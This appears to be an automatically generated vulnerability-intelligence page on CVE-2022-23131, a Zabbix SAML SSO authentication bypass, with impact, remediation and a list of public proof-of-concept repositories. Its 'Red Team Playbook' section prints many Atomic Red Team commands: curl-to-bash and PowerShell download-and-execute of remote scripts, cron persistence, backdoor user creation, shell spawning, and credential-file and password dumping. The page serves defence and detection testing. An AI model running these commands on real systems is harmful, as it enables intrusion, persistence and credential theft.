CVE-2022-23131
Overview
This vulnerability is an authentication bypass caused by improper validation of session data in the Zabbix Frontend when SAML SSO authentication is enabled. The root cause lies in the failure to verify the user login information stored within the session, allowing manipulation of session attributes by unauthenticated actors. The affected component is the session management mechanism tied to the SAML SSO authentication feature in Zabbix Frontend.
Vulnerability Description
In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Malicious unauthenticated actor may exploit this issue to escalate privileges and gain admin access to Zabbix Frontend. To perform the attack, SAML authentication is required to be enabled and the actor has to know the username of Zabbix user (or use the guest account, which is disabled by default).
Impact
An unauthenticated attacker can exploit this vulnerability to gain administrative access to the Zabbix Frontend, enabling full control over the monitoring system. The attacker must have SAML authentication enabled and know a valid username or use the guest account if enabled. Successful exploitation compromises sensitive monitoring data and configuration, potentially allowing manipulation or disruption of monitored infrastructure. This results in a critical breach of system integrity and confidentiality.
Solution
Zabbix has addressed this issue in patched releases; users should upgrade to the latest stable version where the vulnerability is fixed. Refer to the official Zabbix support advisory at https://support.zabbix.com/browse/ZBX-20350 for detailed patch instructions and version-specific remediation steps. Disabling SAML authentication temporarily can serve as a workaround until patches are applied.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the SAML SSO authentication mechanism in Zabbix allows for session data manipulation due to inadequate verification of user login information stored in the session. When SAML authentication is enabled, which is not the default setting, an attacker can exploit this weakness to modify session data. This exploitation occurs because the system fails to validate the authenticity of the session data, allowing unauthorized users to escalate their privileges. Specifically, an unauthenticated actor could potentially gain administrative access to the Zabbix Frontend by either knowing a valid username or leveraging a guest account, which, although disabled by default, could be enabled in certain configurations.
Attack vectors for this vulnerability primarily revolve around the manipulation of session data. An attacker could initiate a session hijacking attack by intercepting or crafting requests that exploit the lack of verification in the session management process. If the attacker knows a valid username, they can craft a request that alters the session data to impersonate that user. In scenarios where the guest account is enabled, the attacker could leverage this account to gain unauthorized access to the system. This exploitation could lead to unauthorized actions within the Zabbix environment, including the ability to modify configurations, access sensitive data, and potentially disrupt services.
The real-world impact of this vulnerability can be significant, particularly for organizations that rely on Zabbix for monitoring and managing their IT infrastructure. Gaining administrative access could allow an attacker to manipulate monitoring settings, disable alerts, or even erase logs, thereby obscuring their activities and making detection more difficult. The business risks associated with such unauthorized access include potential data breaches, loss of service availability, and damage to the organization's reputation. Furthermore, the financial implications of remediation efforts and potential regulatory penalties for failing to secure sensitive data could be substantial.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to ensure that SAML authentication is configured securely, with proper validation mechanisms in place to verify session data. Regular audits of user accounts, especially those with administrative privileges, can help identify any unauthorized access. Additionally, organizations should consider disabling the guest account unless absolutely necessary and ensure that all user accounts have strong, unique passwords. Employing web application firewalls (WAF) can also help detect and block malicious requests that attempt to exploit this vulnerability. Finally, keeping the Zabbix software up to date with the latest security patches is essential to protect against known vulnerabilities.
In conclusion, the vulnerability in the SAML SSO authentication process within Zabbix represents a critical risk that can lead to severe consequences for organizations. By understanding the technical details, potential attack vectors, and real-world implications, cybersecurity professionals can better prepare to defend against such threats. Implementing robust detection and mitigation strategies will not only protect sensitive data but also ensure the integrity and availability of the systems that organizations rely on for their operational success.
Recent adjustments to the CVSS score for CVE-2022-23131 from 9.8 to 9.1 reflect a refined understanding of the vulnerability’s exploitability and impact, as corroborated by stable EPSS metrics indicating consistent but not escalating exploitation likelihood. CSURFACE threat intelligence notes that while the critical severity remains, this recalibration suggests a slightly moderated risk profile, likely due to constraints such as the prerequisite of enabled SAML authentication and knowledge of valid usernames, which limit broad exploitation. Concurrently, the proliferation of new proof-of-concept exploits across multiple public repositories underscores persistent attacker interest and the potential for opportunistic privilege escalation attempts in environments where SAML SSO is active. Our telemetry does not indicate a marked surge in active exploitation campaigns, but the availability of diverse exploit code lowers the barrier for adversaries with moderate capabilities. Consequently, defenders should maintain heightened vigilance, as the threat remains significant, albeit with a marginally reduced urgency compared to initial assessments.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zabbix | Zabbix | All |
cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
|
|
|
Zabbix | Zabbix | 6.0.0 |
cpe:2.3:a:zabbix:zabbix:6.0.0:alpha1:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (22)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Mr-xn/cve-2022-23131
cve-2022-23131 zabbix-saml-bypass-exp
|
Mr-xn | 154 | 47 | 2022-02-18 | View |
|
jweny/CVE-2022-23131
cve-2022-23131 exp
|
jweny | 95 | 38 | 2022-02-18 | View |
|
L0ading-x/cve-2022-23131
cve-2022-23131
|
L0ading-x | 29 | 12 | 2022-02-22 | View |
|
kh4sh3i/CVE-2022-23131
Zabbix - SAML SSO Authentication Bypass
|
kh4sh3i | 15 | 6 | 2022-02-28 | View |
|
Kazaf6s/CVE-2022-23131
CVE-2022-23131漏洞利用工具开箱即用。
|
Kazaf6s | 11 | 4 | 2022-04-02 | View |
|
random-robbie/cve-2022-23131-exp
Zabbix SSO Bypass
|
random-robbie | 8 | 7 | 2022-02-23 | View |
|
SCAMagic/CVE-2022-23131poc-exp-zabbix-
CVE-2022-23131漏洞批量检测与利用脚本
|
SCAMagic | 8 | 3 | 2022-07-22 | View |
|
zwjjustdoit/cve-2022-23131
poc
|
zwjjustdoit | 1 | 4 | 2022-02-21 | View |
|
fork-bombed/CVE-2022-23131
CVE-2022-23131 Zabbix Server SAML authentication exploit
|
fork-bombed | 4 | 0 | 2024-09-18 | View |
|
davidzzo23/CVE-2022-23131
Zabbix Frontend Authentication Bypass Vulnerability
|
davidzzo23 | 3 | 0 | 2024-10-25 | View |
|
Vulnmachines/Zabbix-CVE-2022-23131
Zabbix-SAML-Bypass: CVE-2022-23131
|
Vulnmachines | 2 | 1 | 2022-09-02 | View |
|
1mxml/CVE-2022-23131
|
1mxml | 3 | 0 | 2022-02-18 | View |
|
pykiller/CVE-2022-23131
|
pykiller | 2 | 0 | 2022-02-24 | View |
|
trganda/CVE-2022-23131
|
trganda | 1 | 1 | 2022-02-24 | View |
|
wr0x00/cve-2022-23131
|
wr0x00 | 1 | 1 | 2023-01-07 | View |
|
Fa1c0n35/zabbix-cve-2022-23131
|
Fa1c0n35 | 1 | 0 | 2022-02-27 | View |
|
clearcdq/Zabbix-SAML-SSO-_CVE-2022-23131
|
clearcdq | 1 | 0 | 2023-02-21 | View |
|
Chaelsoo/CVE-2022-23131-Wrappers
|
Chaelsoo | 0 | 0 | 2026-06-22 | View |
|
Arrnitage/CVE-2022-23131_exp
zabbix saml bypass
|
Arrnitage | 0 | 0 | 2023-01-09 | View |
|
dagowda/Zabbix-cve-2022-23131-SSO-bypass
|
dagowda | 0 | 0 | 2024-11-30 | View |
|
qq1549176285/CVE-2022-23131
|
qq1549176285 | 0 | 0 | 2022-02-18 | View |
|
r10lab/CVE-2022-23131
|
r10lab | 0 | 0 | 2023-10-24 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-23131 |
| support.zabbix.com |
GitHub CVE
x_refsource_MISC
|
https://support.zabbix.com/browse/ZBX-20350 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-23131 |